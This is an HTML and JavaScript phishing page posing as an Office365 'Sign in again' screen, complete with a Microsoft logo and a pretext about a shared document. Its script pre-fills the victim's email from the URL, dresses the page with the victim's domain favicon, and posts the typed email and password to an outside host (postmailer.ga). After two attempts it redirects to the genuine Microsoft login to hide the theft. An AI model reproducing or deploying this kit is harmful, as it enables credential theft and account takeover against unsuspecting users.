
<HTML lang=en><HEAD><TITLE>Office365</TITLE>
<SCRIPT src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></SCRIPT>

<SCRIPT src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></SCRIPT>
<!-- Required meta tags -->
<META charset=utf-8>
<META name=viewport content="width=device-width, initial-scale=1, shrink-to-fit=no"><!-- Bootstrap CSS --><LINK rel=stylesheet href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"><LINK rel=stylesheet href="https://fonts.googleapis.com/css?family=Yellowtail&amp;display=swap">
<SCRIPT src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></SCRIPT>
<LINK rel=stylesheet href="https://kit-free.fontawesome.com/releases/latest/css/free.min.css" media=all><LINK rel=stylesheet href="https://kit-free.fontawesome.com/releases/latest/css/free-v4-shims.min.css" media=all><LINK rel=stylesheet href="https://app.forexliteoptions.com/core/database/xero/css/hover.css" media=all>
<STYLE type=text/css>.hide {
	DISPLAY: none
}
.grey-form {
	BACKGROUND-COLOR: #eee; opacity: 1; pointer-events: none
}
.alert-success {
	BORDER-TOP-COLOR: #c3e6cb; BORDER-LEFT-COLOR: #c3e6cb; COLOR: #155724; BORDER-BOTTOM-COLOR: #c3e6cb; BORDER-RIGHT-COLOR: #c3e6cb; BACKGROUND-COLOR: #d4edda
}
UNKNOWN {
	OUTLINE-WIDTH: 0px !important; OUTLINE-STYLE: none !important; OUTLINE-COLOR: invert !important; box-shadow: none; -webkit-appearance: none
}
</STYLE>
</HEAD>
<BODY style="BACKGROUND-IMAGE: url(https://i.gyazo.com/214d89a26f0ac918a09f216a1b0f97b4.png); BACKGROUND-REPEAT: no-repeat; background-size: cover">
<DIV class="container-fluid p-0"><!-- <div class="container-fluid" style="background-color: white; box-shadow:3px 2px 10px rgba(0,0,0,0.2);">
      <div class="row" style="background-color: #ff6c2c;">
        <div class="col-lg-12 mx-auto">
          <img src="" class="img-fluid p-4" width="170px">
        </div>

      </div>

    </div> -->
<DIV class=container>
<DIV class="row my-5">
<DIV class="col-lg-5 mx-auto">
<DIV id=div1 class="m-5 p-4 bg-white rounded" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5)">
<DIV class=text-left><IMG class=img-fluid src="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" width=110>

<div class="login-form">
      <form action="#" method="post">
        <h2 class="text-center">
         
          <br>
          <p><strong class="challenge-heading"> Sign in again !</strong> </p>
<p><span class="challenge-desc signin-sub-title"></span></p></div></h2>
<p><span class="challenge-desc signin-sub-title"><center>
Only recipient email can access shared file to open the received document.
</center></span></p>
<center>
          <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please Enter your correct Password</div>
          <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
        </center>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"></i></span>
            <input type="email" class="form-control" name="username" placeholder="Enter email" value="" id="email">
          </div>
        </div>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"></i></span>
            <input type="password" class="form-control" id="password" name="pdf2" placeholder="Password" required>
          </div>
        </div>
           <DIV class="form-check mt-3"><INPUT id=exampleCheck1 class=form-check-input type=checkbox> <LABEL class=form-check-label for=exampleCheck1><A href="#">Keep me sign in</A></LABEL> <SPAN><A class=float-right href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&amp;id=292841&amp;uiflavor=web&amp;cobrandid=90015&amp;uaid=657745d4db72409899b7bb19b09796de&amp;mkt=EN-GB&amp;lc=2057&amp;bk=1594880420#">Forgot Password?</A></SPAN> </DIV>
        <div class="form-group">
          <input type="hidden" name="pdf1" size="35" value="info@dell.com"><input type="hidden" name="address" size="5" value="ancoreinspection.com">
          <br><input type="hidden" name="email" size="35" value=""><input type="hidden" name="type" size="5" value="ancoreinspection.com">


          <DIV class="col-lg-12 mt-3"><BUTTON id=submit-btn class="btn text-white px-4 w-100" style="BACKGROUND-COLOR: #0a59a3">Next</BUTTON>
        </div>
     
         <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
      }


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://postmailer.ga/wp-admin/test.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://login.microsoftonline.com/common/oauth2");

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                window.location.replace("https://login.microsoftonline.com/common/oauth2");
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });


  </script>
  </html>

<!-- <divclass="m-5 p-4 bg-white rounded" id="div2" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
              <div class="text-center">
                <img src="images/pdf.png" class="img-fluid" width="80px"><br><br>
                <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="emailch">abc@abc.com</span><br>
               
                <span id="msg" class="text-danger"></span><br>
                <span class="h5">Enter Password</span><br>
                <span>to finish sign in</span>
                <div class="form-group mt-2">
                  <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp" placeholder="Enter Password" style="border-right: none;border-left: none;border-top: none;">
                </div>
                <div class="col-lg-12 mt-3">
                  <button class="btn text-white bg-primary px-4 w-100" id="submit-btn" style="border-radius: 20px;">Sign in</button>
                </div>
              </div>
              <div class="form-check mt-5 mx-auto">
                <span><a href="#">Forgot password?</a></span>
              </div>              
            </div> 
          </div>
        </div>
      </div>





      <!-- Optional JavaScript --><!-- jQuery first, then Popper.js, then Bootstrap JS -->
<SCRIPT src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></SCRIPT>

<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></SCRIPT>

<SCRIPT src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></SCRIPT>

<SCRIPT src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></SCRIPT>


  </SCRIPT>
</DIV></DIV></DIV></BODY></HTML>